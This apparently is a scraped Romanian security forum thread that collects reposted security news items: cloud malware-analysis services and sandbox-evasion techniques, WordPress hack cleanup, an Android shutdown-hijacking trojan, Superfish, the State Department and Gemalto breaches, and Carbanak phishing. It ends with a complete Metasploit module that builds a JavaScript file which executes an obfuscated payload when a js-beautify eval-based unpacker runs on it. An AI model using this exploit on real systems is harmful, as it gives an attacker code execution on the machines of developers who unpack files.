? ? ppt/pptx ? ? ? xsl/xsls ? ? ? ? rtf ? htm/html ? ? jar ? ? dll ? ? db ? png/jpg ? zip/rar ? ? cpl ? ie ? ps1 ? python ? vbs ? I’ve spent quite some time putting together the table above, which summarized the supported file formats, document types and other kind of elements that can be analyzed in automated fashion. From the table, we can quickly determine that there isn’t a service that can be used to analyze any kind of file, which is because the malicious code is included in files and documents in a profoundly different manner. When adding a malicious code in executable file, we can do so by including malicious assembly instructions in its .text file section – and that is only one of the ways of doing it. On the other hand, when including a malicious code in a .docx document, we usually include it in a form of a malicious macro, which will get executed by Microsoft Word upon opening the document. Below we’ve presented different categories of categorizing the file formats, document types and other elements presented in the table above. In each of the categories we’ll also briefly discuss how the malicious code gets executed and what is needed for cloud automated malware analysis of such code. Executable Files [exe, elf, mach-o, apk, dll]: a malicious executable file is distributed around the Internet, which is downloaded by users in the form of cracked software programs and cracked games. The users download a program believing to be something they want, which it is, but an additional code is usually appended to the file containing a malicious payload that gets executed on the user’s computer and therefore infecting it. Documents [pdf, doc/docx, ppt/pptx, xsl/xsls, rtf]: vulnerabilities are discovered in different software programs on a daily basis. Therefore, if an attackers finds a vulnerability in an Acrobat Reader (supports pdf file format), Microsoft Word/OpenOffice (supports doc/docx, ppt/pptx, xsl/xslx, rtf), it can form such a document that the program won’t be able to process the file, but will crash instead. Depending on the type of vulnerability, an attacker can possibly execute a malicious payload included in the document. Web browser [url, htm/html, jar, ie]: web browsers also contain vulnerabilities as PDF Reader and Office Suite do. Therefore, an attacker can create a malicious website the web browser will not able to handle, which will lead to the web browser crashing, during which an attacker can execute arbitrary code. Archives [zip/rar]: archives can be used to distribute malicious files around the Internet. If a malicious file is put inside a password protected archive, the usual analysis solutions won’t be able to take a look inside the archive and determine whether it contains malicious files. Images [png/jpg]: an attacker can hide a malicious payload inside an image, which can be processed by a vulnerable web application running on an incorrectly setup web server. Therefore, an analysis solution should be able to parse various image file formats in order to parse images to determine whether they contain anything out of the ordinary, like a malicious payload. Code (python, vbs, ps1) : an attacker can also distribute malicious code written in appropriate programming/scripting language, which is later processed by some application on the victim’s machine. An example of such is PowerShell (ps1) macro included in a Word document, which gets executed on a user’s request when allowing the execution of macros upon opening a malicious .docx document in Microsoft Word. Techniques for Detecting Automated Environments Various techniques exist for detecting automated malware analysis environments, which are being incorporated in malware samples. When malware binaries are using different checks to determine whether they are executing in a controlled environment, they usually don’t execute malicious actions upon environment detection. The picture below presents an overview of malware and techniques it can use to detect if it’s being executed in an automated environment. In order to make the picture clearer, we’ll describe the process in detail. Once the malware has infected the system, it can be running in user or kernel-mode, depending upon the exploitation techniques. Usually malware is running in user-mode, but there are multiple techniques for malware to gain additional privileges to execute in kernel-mode. Despite malware being executed in either user or kernel-mode, there are multiple techniques malware can use to detect if it’s being executed in automated malware analysis environment. At the highest level, the techniques are divided into the following categories: Detect a Debugger: debuggers are mostly used when a malware analyst is manually inspecting a malware sample in order to gain understanding of what it does. Debuggers are not frequently used in automated malware analysis, but different techniques can still be incorporated into the malware sample to make debugging the malware sample more difficult. Anti-Disassembly Tricks: this category isn’t directly related to automated malware analysis environments, but when an analyst is manually reviewing the malware sample in a debugger, malware can use different techniques to confuse disassembly engines into producing incorrect disassembled code. This is only useful when a malware analyst is analyzing the malware sample manually, but doesn’t have much impact in automated malware analysis environments. Detect a Sandbox Environment: a sandbox is an environment separate from the main operating system where malware samples can be run without causing any harm to the rest of the system. The primary purpose of sandbox environment is to emulate different parts of the system, or the whole system to separate the guest system from the host system. Depending on the virtualization layer, there are different types of sandboxes, which are presented below. Virtualized Programs: Chromium Sandbox, Sandboxie Linux Containers: LXC, Docker Virtualized Environment: VirtualPC, VMware, VirtualBox, QEMU Each automated malware analysis tool uses different backend systems to run the malware in a controlled environment. Malware can be run in physical machines or virtual machines. Note that old unused physical machines lying around at home would be a perfect candidate for setting up a malware analysis lab, which would make it considerably more difficult for malware binaries to determine whether they are being executed in a controlled environment. When building our own malware analysis lab, we have to connect multiple machines together to form a network, which can be done simply by virtual or physical switch, depending on the type of machines used. Each cloud automated malware analysis services uses some kind of virtualization environment to run their malware samples, like Qemu/KVM, VirtualBox, VMWare, etc. According to the virtualization technology being used, a malware sample can use different techniques to detect that it’s being analyzed and terminate immediately. Thus the malware sample will not be flagged as malicious, since it terminated preemptively without execution the malicious code. In this section we’ve seen that different cloud malware analysis services use different virtualization technologies to run submitted malware samples. As far as I know, only Joe Sandbox has an option of running malware samples on actual physical machines, which prevents certain techniques from being used in malware samples to detect if they are being run in an automated malware analysis environment. Still, there are many other techniques a malware can use to detect if it’s being analyzed. This is a cat and mouse game, where new detection techniques are invented and used by malware samples on a daily basis. On the other hand, there are numerous anti-detection techniques used to prevent the malware from determining it’s being executed in an automated malware analysis environment. When a new detection technique appears, usually a new anti-detection technique is put together to render the detection technique useless. Conclusion In this article we’ve presented the differences between multiple cloud malware analysis services that can be used to analyze different file formats and document types. Each service supports only a fraction of all file formats and document types in which malicious code can be injected. Therefore, depending on the file we have to analyze, we can use the services that support its corresponding file format or document type. In order to analyze a document, we have to choose the appropriate service in order to do so. Since there are many techniques an attacker can use to determine whether the malicious payload is being executed in an automated malware analysis environment, some malicious samples won’t be analyzed correctly, resulting in false positives. Therefore, such services should only be used together with a reverse engineer or malware analyst in order to manually determine whether the file is malicious or not. Since there are many malicious samples distributed around the Internet on a daily basis, every sample cannot be manually inspected, which is why cloud automated malware analysis services are a great way to speed up the analysis. Source

WordPress is the most popular CMS (Content Management System) available nowadays online, used by the vast majority of all sites. If you have a look at this report, WordPress holds the lion share (60.6%) of the sites whose CMS we know and a total of 23.4% of all sites. It is easy to use and it offers great flexibility, with both ready and custom templates and a plethora of plugins to put into effect. Moreover, WordPress provides its users with the opportunity to enhance the SEO-friendly (and thus Google-friendly) nature of their site pretty smoothly and it also offers mobile-friendly themes. These are some of the major reasons why WordPress has been characterized as one of the most successful CMS options to date, and this is why it is the number one choice for many web designers, developers, tech freaks and even novices and tech-illiterate people who seek to find a simple yet effective tool for creating their site. Due to its exponential growth and its universal popularity, WordPress is not immune to threats and hacking attempts. It is true that the more popular something is, the more likely it will be for others to seek compromising it in the long run. This is why it is not that rare a phenomenon to hear about WordPress sites having been hacked and not being able to function properly. Before we continue with our guide about cleaning up WordPress, it is important that we truly understand what website hacking is and what this can do to your site and your computer. What Website Hacking is, and How it Affects You There are two major types of website hacking that you should beware of, in order to ensure that you offer the best user experience to every single visitor and not compromise his or her overall security: The first type has to do with the establishment of a backdoor; this means that the hacker leaves room for returning to your site whenever he feels like it and gaining access to places that should be out of reach for him. The difficulty in tracing this type of website hacking lies in the fact that this backdoor is not visible to the naked eye – and thus it can go unnoticed for a truly long time. The second type involves the deterioration of user experience and the compromise of your site directly from the source. The visitors that click on your site can be redirected to other sites or get pop-ups on their screen as soon as they head to your home page. In addition, malware can be installed silently to the computers of your site’s visitors, and of course this is never a good thing. Now that we have comprehended what goes on in cases of WordPress sites being hacked, and before moving on to the process of WordPress database cleanup, it is time to highlight the signs that should alarm you that something is wrong with your site. Signs that Reveal a Potential WordPress Hack Even though the signs are not a perfect match to every single WordPress site that has been compromised, they offer some truly helpful information that should get you on your feet and urge you to dig deeper and see whether or not your site has indeed been hacked. Let’s see these signs in the form of bullets: Problems with e-mails: The hackers will start sending e-mails from your site, and you will most probably be blocked as spam mailer. This can affect your communication with others, as you will not even have a clue about your e-mail activity. Bad content added to WP: You cannot control what content is added to your site, and this is in fact one of the major factors that ought to urge you to start cleaning up the mess. Slow performance or crash: This is another indicator that you are in need of WordPress clean up after a hack. If you are experiencing too slow performance or if you see that your site has crashed, you should look no further. Traffic drops significantly: You will most likely observe that you get no traffic at all or you have lost most of your visitors from one day to the next. Unless you have dealt with a matter of bad reputation recently, this should alarm you. Website disappears: This is the most shocking sign that your site has been under attack. In some cases, the hackers remove everything from the site and thus take it down. As soon as you have noticed some of these signs, it is high time to take matters into your own hands. Though this process is neither easy nor simple to complete, you can in fact repair your WordPress site and make sure that you shield it against any future acts of this sort. How to Repair Your Hacked WordPress Site From the very moment when you determine that your WordPress site has been hacked, you need to take some immediate actions and start working toward cleaning everything up and securing your digital premises. Let’s have a look at what it takes for you to accomplish that: Restore Your Site via Upgrade and Reinstallation: Make use of your backup and restore your site, so that it can keep running. Upon doing so, you need to be thorough while reinstalling all the plugins and additional tools that you have been using so far. It is important to reinstall them and then upgrade them to the latest version. Scan and Cleanup Your Machine: If you had not installed an anti-virus program, please DO! This is essential, in order to highlight any red flags for you to consider. Scan the machine of yours in detail and fix any problems that emerge. Change All the Passwords: Do not be sloppy when it comes to cleaning up WordPress. On the contrary, you ought to be really scholastic and change all the passwords that you have been using in e-mail accounts, financial transactions and anywhere else. Of course, it goes without even saying that you need to change the WP administrator password and get a new one (rather than the default that many users don’t mind keeping). Back up Everything: Besides being able to restore your site in the event of hacking or crashing, you can compare the backups with your current WP site and check for any alterations whatsoever. Check wp-config.php File: If you come across any modifications when comparing your file with the wp-config-sample.php file, you had better change them. Engage in Premium Security Solutions: Although it can be tempting to handle your WordPress site and its maintenance on your own or make use of your son’s talent or the wit of your best friend, such options generally come with a greater percentage of risk. Instead, consider premium security solutions that will safeguard your site and deal with the proper WordPress maintenance required. Any Uploaded File Should Be Copied: This will allow you to keep everything under control. Even in the discomforting event of a crash or any other problem getting in the way, you will know that you have got copies to turn to. Fresh, New Version of WordPress: Do not settle for older versions of WordPress. Instead, be sure to get updates and have the latest version of WordPress that has fixed security issues and can keep you thoroughly protected. Go through Every Post: This can take some time, but it is worth the trouble. You should go through every post of yours and identify any problem, in order to deal with it effectively. How to Protect Your Site from Any Future Attack As hacking is not a one-time deal, you will have to comply with some security precautions that help you maintain everything perfectly secured on your WordPress site. Below, there are some pieces of advice that you ought to consider for protecting your WordPress website from any malicious intent: Restrict Administrative Privileges: The fewer the people who access your admin panel, the less likely it will be for breaches to occur. Scan on a Daily Basis: If you are vigilant and you do not neglect scanning your site daily for bugs and other vulnerabilities, the hack is less likely to succeed. Use Secured Protocols: Instead of connecting with the use of FTP, you can go for SFTP or SSH for ensuring that it is infinitely more difficult for somebody to track you down. Use 2-Verification: Make sure that you enhance your site’s security using 2-step verification. This will result in the hacker requiring much bigger effort towards accessing your site. Disable PHP Execution: You can find detailed instructions on how you can do that, since it will certainly help you out eliminate threats in the future. From everything that has been analyzed in this article on cleaning up WordPress, this is a tough job – however, it is not impossible to complete and what you gain is truly remarkable; a fully protected WordPress site that does not compromise anything in terms of security and performance! Source

@Nytro a aparut partea a doua! Gh0st RAT Part 2: Packet Structure and Defense Measures Ar trebui sa redenumeasca seria " Indianul care aduce cartea Part I , II etc.."

Security researchers have unearthed a new Android Trojan that tricks victims into believing they have switched their device off while it continues "spying" on the users' activities in the background. So, next time be very sure while you turn off your Android smartphones. The new Android malware threat, dubbed PowerOffHijack, has been spotted and analyzed by the researchers at the security firm AVG. PowerOffHijack because the nasty malware has a very unique feature - it hijacks the shutdown process of user’s mobile phone. MALWARE WORKS AFTER SWITCHING OFF MOBILES When users presses the power button on their device, a fake dialog box is shown. The malware mimics the shutdown animation and the device appears to be off, but actually remains on, giving the malicious program freedom to move around on the device and steal data. /HOW DOES POWEROFFHIJACK MALWARE WORKS ? Once installed, the malware asks for root-level permissions and tampers with the 'system_server' file of the operating system to affect the shutdown process. The malware particularly hijacks the mWindowManagerFuncs interface, so that it can display a fake shutdown dialog box and animation every time the victim presses the power button. The nasty malware is apparently being propagated via third-party online app stores, but the researchers haven't mentioned the names of the the innocent-looking apps, also they haven’t explained how the malware gains the root access of the device. The code shown by AVG appears to contact Chinese services. USERS AND ANDROID VERSIONS INFECTED According to the company, PowerOffHijack malware infects devices running Android versions below 5.0 (Lollipop) and requires root access to perform the tasks. So far, PowerOffHijack malware has already infected more than 10,000 devices, mostly in China where the malware was first introduced and offered through the local, official app stores. PowerOffHijack malware has ability to silently send lots of premium-rate text messages, make calls to expensive overseas numbers, take photos and perform many other tasks even if the phone is supposedly switched off. EASY STEPS TO GET RID OF POWEROFFHIJACK In order to get rid of PowerOffHijack malware, users are advised to take some simple steps: To restart infected device manually just take out the battery. Remove malicious, untrusted and useless apps from your Android device. Do not install apps from 3rd Party app stores. Make sure you have a good anti-virus installed and updated on your mobile devices. AVG antivirus product can detect PowerOffHijack malware. Source

Google on Thursday unleashed its own free web application vulnerability scanner tool, which the search engine giant calls Google Cloud Security Scanner, that will potentially scan developers' applications for common security vulnerabilities on its cloud platform more effectively. SCANNER ADDRESSES TWO MAJOR WEB VULNERABILITIES Google launched the Google Cloud Security Scanner in beta. The New web application vulnerability scanner allows App Engine developers to regularly scan their applications for two common web application vulnerabilities: Cross-Site Scripting (XSS) Mixed Content Scripts Despite several free web application vulnerability scanner and vulnerability assessment tools are available in the market, Google says these website vulnerability scanners are typically hard to set up and "built for security professionals," not for web application developers that run the apps on the Google App Engine. While Google Cloud Security Scanner will be easier for web application developers to use. This web application vulnerability scanner easily scans for Cross-Site Scripting (XSS) and mixed content scripts flaws, which the company argues are the most common security vulnerabilities Google App Engine developers face. Today, common HTML5 and JavaScript-heavy applications are more challenging to crawl and test, and Google Cloud Security Scanner claims to take a novel approach by parsing the code and then executing a full-page render to find more complex areas of a developer's site. GO FOR WEB VULNERABILITY SCAN NOW The developers can access the Cloud Security Scanner under Compute > App Engine > Security in Google's Developers Console. This will run your first scan. It does not work with App Engine Managed VMs, Google Compute Engine, or other resources. Google notes that there are two typical approaches to such security scans: Parse the HTML and emulate a browser – This is fast; however, it comes at the cost of missing site actions that require a full DOM or complex JavaScript operations. Use a real browser – This approach avoids the parser coverage gap and most closely simulates the site experience. However, it can be slow due to event firing, dynamic execution, and time needed for the DOM to settle. Security Engineering head Rob Mann says that their web vulnerability scanner uses Google Compute Engine to dynamically create a botnet of hundreds of virtual Chrome workers that scan at a max rate of 20 requests per second, so that the target sites won’t be overloaded. The search engine giant still recommended developers to look into manual security review by a web app security professional, just to be on the safer side. However, the company hopes its vulnerability scanner tool will definitely provide a simple solution to the most common App Engine issues with minimal false positives. Source

Trey Ford from Project Sonar describes the group’s initiative at Kaspersky’s Security Analyst Summit. The Rapid7 service scans public networks for applications, software, and hardware, then analyzes that cache of information to learn trends and gain insight on common vulnerabilities. Source

CANCUN–When (or if) people think about the security of the devices they interact with and use on a daily basis, the machines that run their local car wash probably aren’t high up on that list. But, like everything else with a computer for a brain these days, those machines are connected to the Internet. And Billy Rios can hack them. Rios has spent years pulling apart the innards of all kinds of automation equipment, mostly in the ICS and SCADA realms. But now that TVs, parking meters, dishwashers and everything else under the sun comes with an embedded Web server and other potential targets, he has begun having a look at what surprises those devices hold, as well. Looking in one of the more obscure corners of the web, he discovered automated car wash equipment online. The device he researched has a considerable attack surface. The device was running a version of Windows CE on an ARM processor and after a bit of poking around, Rios found that it also had Telnet enabled and a default five-character password and default username. “If you know that default username and default password you can do a lot of interesting things,” Rios said in a talk at the Kaspersky Lab Security Analyst Summit here Tuesday. “You car wash can send you emails and yes, your car wash is on Facebook, too.” The car wash device controls the mechanisms that wash the top and bottom of a car and by sending special POST requests to the device, an attacker could cause some mischief, such as changing the kind of wash a car is getting. But more seriously, if an attacker was able to access the device, he also could disable the safety sensors on the back and front doors of the wash bay, which prevent them from coming down on a person or vehicle. The problem isn’t limited to one manufacturer or one industry or one kind of device. Lack of security in Internet-enabled devices is spread across the board. “Remote access changes your threat model. But to be honest, I don’t think we can trust the makers,” Rios said, referring to manufacturers of all sorts of gear with embedded computers and remote access capabilities. “The people who made that car wash won’t understand any of things we just talked about, like SQL injection or buffer overflows. We’re going to see this in other IoT places as well.” Security researchers have been turning their attention to the growing crop of non-PC devices that contain computers, WiFi, Bluetooth and other capabilities, and what they’re finding in terms of security controls is typically pretty bad. Many of companies rushing to Internet-enable everything they make aren’t spending a lot of time thinking about the security implications of what they’re doing, but the attackers are. “It’s asymmetric. The knowledge in attacking these things is very high and it’s very low in defending,” Rios said. Source

Computer maker Lenovo has been forced to remove hidden adware that it was shipping on its laptops and PCs after users expressed anger. The adware - dubbed Superfish - was potentially compromising their security, said experts. The hidden software was also injecting adverts on to browsers using techniques more akin to malware, they added. Lenovo faces questions about why and for how long it was pre-installed on machines - and what data was collected. The company told the BBC in a statement: "Lenovo removed Superfish from the preloads of new consumer systems in January 2015. At the same time Superfish disabled existing Lenovo machines in the market from activating Superfish. Complaining "Superfish was preloaded on to a select number of consumer models only. Lenovo is thoroughly investigating all and any new concerns raised regarding Superfish." Users began complaining about Superfish in Lenovo's forums in the autumn, and the firm told the BBC that it was shipped "in a short window from October to December to help customers potentially discover interesting products while shopping". User feedback, it acknowledged, "was not positive". Last month, forum administrator Mark Hopkins told users that "due to some issues (browser pop up behaviour, for example)", the company had "temporarily removed Superfish from our consumer systems until such time as Superfish is able to provide a software build that addresses these issues". He added it had requested that Superfish issue an auto-update for "units already in market". Superfish was designed to help users find products by visually analysing images on the web to find the cheapest ones. Such adware is widely regarded in the industry as a form of malware because of the way it interacts with a person's laptop or PC. Security expert from Surrey University Prof Alan Woodward said: "It is annoying. It is not acceptable. It pops up adverts that you never asked for. It is like Google on steroids. "This bit of software is particularly naughty. People have shown that it can basically intercept everything and it could be really misused." According to security experts, it appears that Lenovo had given Superfish permission to issue its own certificates, allowing it to collect data over secure web connections, known in malware parlance as a man-in-the-middle attack. "If someone went to, say, the Bank of America then Superfish would issue its own certificate pretending to be the Bank of America and intercept whatever you are sending back and forth," said Prof Woodward. Ken Westin, senior analyst at security company Tripwire, agreed: "If the findings are true and Lenovo is installing their own self-signed certificates, they have not only betrayed their customers' trust, but also put them at increased risk." Clean install Although Lenovo has said that it has removed Superfish from new machines and disabled it from others, it was unclear what the situation would be for machines where it had already been activated. Prof Woodward said: "Lenovo is being very coy about this but it needs to explain how long it has been doing this, what the scale is and where all the data it has collected is being stored. "There will be remnants of it left on machines and Lenovo does not ship the disks that allow people to do a clean install." It raises wider questions about the deals that computer manufacturers do with third parties and the amount of software that comes pre-installed on machines. Mr Westin said: "With increasingly security and privacy-conscious buyers, laptop and mobile phone manufacturers may well be doing themselves a disservice by seeking outdated advertising based monetisation strategies." Users were particularly angry that they had not been told about the adware. One Lenovo forum user said: "It's not like they stuck it on the flier saying... we install adware on our computers so we can profit from our customers by using hidden software. "However, I now know this. I now will not buy any Lenovo laptop again." The problem also caused a storm on Twitter, where both Lenovo and Superfish were among the most popular discussion topics. Source

Email servers still compromised after THREE months An attack against US State Department servers is still ongoing three months after the agency spotted miscreants inside its email system, it's reported. In November the State Department was forced to suspend its unclassified email systems after it was successfully infiltrated by hackers unknown. At the time the agency said its classified emails were unaffected by the hack. Now Bloomberg and the Wall Street Journal report multiple sources saying that the attack is still ongoing: the bad guys and girls still have remote access to internal computers. Every time sysadmins find and delete a malware infection, installed by the hackers, another variant pops up. The point of failure was, we're told, a user clicking on a link to a dodgy website using an unpatched browser, leading to malicious remote-code execution. Once inside the network, the attackers spread out to the department's computers overseas, many of which now harbor malware. Remote access to email inboxes has been disabled, it's reported. IT staff can't switch off the network to freeze the infection because the computer systems must remain operation for security reasons. Five sources report that the attacks are Russian in origin, with one former US intelligence officer claiming that Putin’s online warriors are just as good as Uncle Sam's. The secure email system is reportedly still safe, but unclassified emails can contain lots of juicy information – and hackers could masquerade as officials on the network to gain access to more sensitive documents. Messages regarding US policy on the Ukraine, and other files, have been swiped from the system, two sources report. The difficulty in blocking further attacks raises worrying possibilities for the rest of the government’s IT managers. The State Department’s servers was compromised as part of large-scale attack against US government systems, with the White House, the US Postal Service, and the National Weather Service all falling prey, albeit briefly. “We deal successfully with thousands of attacks every day,” State Department spokeswoman Marie Harf told the Journal in a statement. “We take any possible cyber intrusion very serious - as we did with the one we discussed several months ago — and we deal with them in conjunction with other relevant government agencies.” Given the amount the US spends on information security these days it seems amazing that the NSA can’t rustle up a few of its hackers so adept at attacking and subverting legitimate means of communications and focus on defense for a change. Since 2001 the US has publicaly spent over $500bn on its intelligence services, and documents leaked by Edward Snowden show the NSA and CIA spent over $25bn in 2013 alone. It doesn’t seem as though the American taxpayer is getting value for money. Source

The world's biggest SIM card manufacturer, Gemalto, revealed yesterday to have been hacked by the NSA and GCHQ, has taken a $470m hit in its stock price. Gemalto was caught unawares by the revelation that the US and UK intelligence agencies had compromised its systems, and stole potentially millions of SIM card keys used to encrypt phone calls around the world. Gemalto supplies SIMs to 450 networks on Earth, from AT&T to T-Mobile, and launched an investigation. Speculation that the Dutch manufacturer may be forced to recall chips, incurring huge costs, caused its share price to fall eight per cent in early trading before recovering a little to four per cent down on closing. Obtaining SIM card private keys allows intelligence agencies to decrypt intercepted calls without anyone knowing – not the users, the network operators nor the handset manufactures. Communications eavesdropped today, yesterday or five years ago can be decoded once a SIM's Ki key is obtained. The company issued a statement today in which it promised to get to the bottom of the hack: "Gemalto is especially vigilant against malicious hackers, and has detected, logged and mitigated many types of attempts over the years. At present we cannot prove a link between those past attempts and what was reported yesterday. “We take this publication very seriously and will devote all resources necessary to fully investigate and understand the scope of such sophisticated techniques.” Incensed Security watchers praised the company for its prompt and forthright response. But privacy and communications experts are incensed by the latest revelations about GCHQ/NSA warrantless mass surveillance. The World Wide Web Foundation has called for urgent steps to be taken to secure private calls and online communications. Its chief exec Anne Jellema commented: "The news that US and UK spy agencies hacked the network of a Dutch company to steal encryption keys for billions of SIM cards is truly shocking. "Possession of these keys would allow these agencies to access private calls, web browsing records and other online communications without any of the legal safeguards and processes in place to prevent abuses of power.” Jellema argued that the surveillance would undermine trust in mobile payments, among other concerns. “This is yet another worrying sign that these agencies think they are above the law. Apart from its blatant disregard for multiple human rights, this foolish move undermines the security and future of the global mobile payments industry." She noted that any security weakness or backdoors into a cryptographic system might also be exploited by third-party cybercriminals and called for an investigation into GCHQ including "a full and frank disclosure as to why they hacked a private company, and one headquartered in an ally country." Other security experts warned that other intelligence agencies may be up to the same tricks. Andrew Conway, research analyst at Cloudmark, said: “The ease with which the NSA and GCHQ were able to compromise all mobile communications is shocking. But there are other nation state actors with just as much determination and sophisticated hackers. In particular, China's Axiom Group has shown remarkable abilities to penetrate targets in the West.” Not just the NSA? He highlighted other worrying accounts of mobile companies being targeted: "Last year, mobile security company ESD revealed that they had detected a network of fake mobile phone towers intercepting communications near US military bases. It was assumed that whoever was responsible was just collecting metadata, because 3G and 4G communications are encrypted. Could it be that this was some foreign espionage agency with the ability to listen to US mobile phone calls? Or perhaps it was the NSA monitoring all civilian phone calls near military bases for possible terrorist activity? Regardless, it is clear that mobile communications have been badly compromised.” A complete revamp of mobile comm security may eventually be required, Conway concluded. "In the short term organizations requiring secure voice communications can consider deploying mobile devices with another layer of encryption, such as Blackphone or Cryptophone. In the long term, we need to do a better job of end-to-end encryption of all mobile and fixed line communications - which will include not relying on a single master key for all communications." Source

This week's headlines have been security heavy thanks to the influx of news coming from Kaspersky's Security Analyst Summit. We've seen Kaspersky report everything from a $1bn cyber bank heist operation, to potentially NSA-sponsored and Middle Eastern advanced persistent threats. Specifically we saw threat research papers on the Carbanak, Equation and Desert Falcons attack campaigns. Carbanak is a banking-focused cyber operation that is believed to have stolen $1bn from 100 banks in more than 30 regions using specialist attack tools. Equation is a dangerous hack campaign, believed to have stemmed from the US National Security Agency, that uses a selection of attack tools, including one that can infect the operating systems on hard drives. Desert Falcons is a Middle Eastern cyber mercenary group that is believed to have infected thousands of Windows and Android devices with over 100 different malware variants. Each of these campaigns has its own specific implications for security professionals and the industry in general, but there is one unifying factor for me that is the most interesting: all three used phishing as a primary infection tactic. Phishing, for those who don't know, is an attack that aims to spread malware using infected messages that often masquerade as stemming from a trustworthy source. The message system used in phishing campaigns can include everything from Facebook posts and instant messages, to tweets and basic email. The campaigns are sometimes fairly basic and easy to see through, such as the Nigerian prince emails that circulate offering incredible sums of money in return for bank details, while others can include a social engineering element and are made to look like invoices or corporate communications. The attack strategy may sound simple enough to stop, but for me the trio of threats highlighted by Kaspersky show that most businesses still haven't addressed the phishing threat. There are likely to be several reasons why phishing still works so well. One of the most common that I hear from talking to industry professionals is that many businesses still assume that security is an out-of-the-box technological issue, not a cultural one. Despite constant warnings from security providers and government departments, many companies still assume that, if they have basic perimeter defences in place, they have ticked the security box and don't have to worry about cyber attacks, such as phishing. Sadly, this simply isn't the case. The Carbanak campaign is a particularly good example. Carbanak initially targets victims with spear phishing emails designed to look like legitimate banking communications. The messages contain malicious Microsoft Word and Control Panel Applet attachments that exploit flaws in Microsoft Office 2003, 2007 and 2010 (CVE-2012-0158 and CVE-2013-3906) and Microsoft Word (CVE-2014-1761) to execute the Carbanak backdoor. The initial infection didn't get the hackers access to the more secure internal systems they wanted to breach, but it did get them far enough into the network to begin a reconnaissance phase targeting bank employees, particularly systems administrators. From here, using information stolen during the reconnaissance phase, the attackers were able to get to the companies' crown jewels and steal vast sums of money. The key takeaway here is that firms need to back up their defence technology with robust cyber security awareness, using education programmes that not only teach staff how to spot and avoid falling victim to phishing messages, but how to report incidents to the IT team. Incidents will, of course, still occur; some of the social engineering behind phishing is seriously impressive and can lead to very realistic looking communications. But it would help dramatically to reduce the hackers' win rates and profit margins, a development I think everyone on the right side of the law would regard as positive. Hopefully, while bad, the discovery of Carbanak, Equation and Desert Falcons will at the very least make some firms aware of this. Although, considering my past experience covering the fallout of these attack campaigns, I'm not holding my breath. Source

@alin63 intrebarea este de ceea ce ai tu nevoie, poti folosi Ubuntu sau Lubuntu daca ai un pc mai slab. Depinde de ceea ce vrei tu sa faci, adica ce faci la pc. ( stai pe fb sau lucrezi etc... )

@ILIE_2015_KILLER incearca man sa scrii fara caps lock activ fiindca vedem foarte bine. On:// Sugestia ta este total irelevanta ( e un forum de Securitate IT ), te intelegem ca esti foarte credincios dar totusi incearca sa mentii nivelul discutiile pe partea de IT. ( posibil sa fi troll ) Votul meu este : Contra.

@Vehuiah poti da mai multe detalii ( aici sau pe privat ) de ceea ce esti interesat adica daca ai firma etc, cam ce ai dori?

Update: Packet Fence 4.6.1 Changes: Various updates. Link: Download SHA1 sum: 9713cd5a59f4644dd6defa995afcf77cb977e8dc

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'msf/core/exploit/jsobfu' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FILEFORMAT include Msf::Exploit::JSObfu def initialize(info = {}) super(update_info(info, 'Name' => 'Javascript Injection for Eval-based Unpackers', 'Description' => %q{ This module generates a Javascript file that executes arbitrary code when an eval-based unpacker is run on it. Works against js-beautify's P_A_C_K_E_R unpacker. }, 'Author' => [ 'joev' ], 'License' => MSF_LICENSE, 'References' => [ ], 'Platform' => 'nodejs', 'Arch' => ARCH_NODEJS, 'Privileged' => false, 'Targets' => [['Automatic', {}]], 'DisclosureDate' => 'Feb 18 2015', 'DefaultTarget' => 0)) register_options([ OptString.new('FILENAME', [true, 'The file name.', 'msf.js']), OptString.new('CUSTOM_JS', [false, 'Custom Javascript payload.']) ], self.class) end def exploit p = js_obfuscate(datastore['CUSTOM_JS'] || payload.encoded); print_status("Creating '#{datastore['FILENAME']}' file...") file_create("eval(function(p,a,c,k,e,r){}((function(){ #{p} })(),''.split('|'),0,{}))") end end Source